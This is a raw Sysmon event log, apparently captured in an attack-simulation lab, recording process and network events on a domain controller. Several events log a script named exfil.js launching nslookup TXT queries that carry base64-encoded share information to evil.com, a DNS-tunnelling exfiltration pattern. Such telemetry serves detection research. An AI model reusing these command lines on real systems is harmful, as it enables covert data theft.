14:21:44.394{2E1864BB-18F8-629A-6B45-000000005F02}61923792C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6C45-000000005F02}3872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.394{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.394{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.394{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.394{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.394{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6C45-000000005F02}3872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.394{2E1864BB-18F8-629A-6A45-000000005F02}51045760C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-6C45-000000005F02}3872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.404{2E1864BB-18F8-629A-6C45-000000005F02}3872C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-6A45-000000005F02}5104C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluoqz.tmp 2>&1 10341000x8000000000000000213344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.372{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6B45-000000005F02}6192C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.372{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6B45-000000005F02}6192C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.372{2E1864BB-18F8-629A-6B45-000000005F02}61923792C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6A45-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.372{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6B45-000000005F02}6192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.357{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.357{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.357{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.357{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.357{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6A45-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.357{2E1864BB-18E0-629A-6742-000000005F02}39768072C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-6A45-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.367{2E1864BB-18F8-629A-6A45-000000005F02}5104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluoqz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.357{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlozh.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.341{2E1864BB-18F8-629A-6845-000000005F02}55163140C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6945-000000005F02}7688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.325{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.325{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.325{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.325{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.325{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6945-000000005F02}7688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.325{2E1864BB-18F8-629A-6745-000000005F02}43487260C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-6945-000000005F02}7688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.339{2E1864BB-18F8-629A-6945-000000005F02}7688C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-6745-000000005F02}4348C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlozh.tmp 2>&1 354300x8000000000000000213324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.883{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51085- 354300x8000000000000000213323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.882{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51084- 354300x8000000000000000213322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.882{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51083- 354300x8000000000000000213321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.834{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56427-false10.0.1.12-8000- 354300x8000000000000000213320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.794{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51082- 354300x8000000000000000213319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.794{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51081- 354300x8000000000000000213318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51080- 354300x8000000000000000213317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.720{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51079- 354300x8000000000000000213316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.720{00000000-0000-0000-0000-000000000000}3712<unknown process>-udptruefalse127.0.0.1-51079-false127.0.0.1-53domain 354300x8000000000000000213315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.720{00000000-0000-0000-0000-000000000000}3712<unknown process>-udpfalsefalse127.0.0.1-51078-false127.0.0.1-53domain 